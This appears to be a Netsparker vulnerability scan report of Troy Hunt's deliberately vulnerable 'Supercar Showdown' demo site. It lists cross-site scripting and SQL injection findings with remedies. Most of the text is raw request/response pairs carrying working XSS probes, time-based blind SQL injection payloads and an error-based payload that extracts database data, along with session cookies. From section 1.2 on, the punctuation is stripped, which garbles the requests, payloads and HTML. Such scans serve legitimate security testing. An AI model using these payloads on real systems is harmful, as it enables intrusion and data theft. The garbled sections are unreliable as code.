Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Log in - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><…
MEDIUM: 3 total

9. [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.

Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking user's active session
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks

Remedy
This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.

There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-cross-site scripting libraries.

Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet
External References: XSS Cheat Sheet; OWASP - cross-site scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
9.1 /api/vote
http://hackyourselffirst.troyhunt.com/api/vote

Parameters
Parameter | Type | Value
userId | POST | 1
supercarId | POST | 3
comments | POST | '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Notes
Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Certainty
Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments='"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Response
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.\r\nIncorrect syntax near '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n   at Web.Controllers.VoteController.Post(Vote vote)\r\n   at lambda_method(Closure , Object , Object[] )\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…
9.2 /api/admin
http://hackyourselffirst.troyhunt.com/api/admin?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt

Parameters
Parameter | Type | Value
nsextt | GET | '"--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>

Notes
Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Certainty
Request
GET /api/admin?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
VULNERABILITY SUMMARY (continued)
URL | Parameter | Method | Vulnerability | Confirmed
/Make/2 | orderby | GET | [Possible] SQL Injection | No
/Make/3 | orderby | GET | Blind SQL Injection | Yes
/Make/3 | orderby | GET | SQL Injection | Yes
/Make/3 | orderby | GET | [Possible] SQL Injection | No
/robots.txt | | | Robots.txt Detected | Yes
/Search | searchTerm | GET | Cross-site Scripting | Yes
/Supercar/3 | | | Permanent Cross-site Scripting | Yes
/Supercar/3 | | | [Possible] Internal Path Disclosure (*nix) | No
/Supercar/3 | | | [Possible] Internal Path Disclosure (Windows) | No
/Supercar/Leaderboard | orderBy | GET | Blind SQL Injection | Yes
/Supercar/Leaderboard | orderBy | GET | SQL Injection | Yes
CRITICAL: 5 total, 5 confirmed

1. Blind SQL Injection
Netsparker identified a blind SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.

This is an extremely common vulnerability and its successful exploitation can have critical implications.

Netsparker confirmed the vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed us to identify and confirm the SQL injection.

Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system

Actions to Take
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
3. Locate all dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks to this resource.

Remedy
A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.

External References: OWASP SQL injection; SQL injection Cheat sheet
Remedy References: MSDN - Protect From SQL injection in ASP.NET
Classification: OWASP 2010-A1, OWASP 2013-A1, PCI V2.0-6.5.1, PCI V3.0-6.5.1, CWE-89, CAPEC-66, WASC-19
1.1 /Make/1 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/1?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--

Parameters
Parameter | Type | Value
orderby | GET | 1 WAITFOR DELAY '0:0:25'--
Request
GET /Make/1?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:00:21 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Nissans - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.2 /Supercar/Leaderboard CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=1+WAITFOR+DELAY+%270%3a0%3a25%27-

Parameters
Parameter | Type | Value
orderBy | GET | 1 WAITFOR DELAY '0:0:25'--
asc | GET | false

Request
GET /Supercar/Leaderboard?orderBy=1+WAITFOR+DELAY+%270%3a0%3a25%27--&asc=false HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 231609 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2885Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtSupercar Leaderboard - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
…
1.3 /Make/3 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/3?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--
Parameters
Parameter   Type   Value
orderby     GET    1' WAITFOR DELAY '0:0:25'--
RequestGET Make3orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230647 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtPaganis - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
…
1.4 /Make/2 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/2?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--
Parameters
Parameter   Type   Value
orderby     GET    1' WAITFOR DELAY '0:0:25'--
RequestGET Make2orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230334 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtMcLarens - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
…
1.5 /api/vote CONFIRMED http://hackyourselffirst.troyhunt.com/api/vote
Parameters
Parameter    Type   Value
userId       POST   1
supercarId   POST   3
comments     POST   ') WAITFOR DELAY '0:0:25'--
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 68Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=27)+WAITFOR+DELAY+2703a03a2527--
ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232122 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
CRITICAL: 5 total, 5 confirmed

2. SQL Injection
Netsparker identified an SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Netsparker confirmed the vulnerability by executing a test SQL query on the backend database.

Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system

Actions to Take
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks to this resource.

Remedy
A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.

External References
OWASP SQL injection
SQL injection Cheat sheet

Remedy References
MSDN - Protect From SQL injection in ASP.NET

Classification
OWASP 2010-A1, OWASP 2013-A1, PCI V2.0-6.5.1, PCI V3.0-6.5.1, CWE-89, CAPEC-66, WASC-19
2.1 /api/vote CONFIRMED http://hackyourselffirst.troyhunt.com/api/vote
Parameters
Parameter    Type   Value
userId       POST   1
supercarId   POST   3
comments     POST   (select convert(int, CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+C
Extracted Data: microsoft sql azure (rtm) - 110922217 \n\taug 20 2014 22:37:56 \n\tcopyright (c) microsoft corporation\n
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 209Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=272b+(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)+2b27
ResponsehellipPNETContent-Length 2867Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageConversion failed when converting the varchar value _2dilemma to data typeintExceptionTypeSystemDataSqlClientSqlExceptionStackTrace at SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnectionAction`1 wraphellip
2.2 /Supercar/Leaderboard CONFIRMED http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=(select+convert(int%2cCHAR(95)%2b
Parameters
Parameter   Type   Value
orderBy     GET    (select convert(int, CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
asc         GET    false
Extracted Data: microsoft sql azure (rtm) - 110922217 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
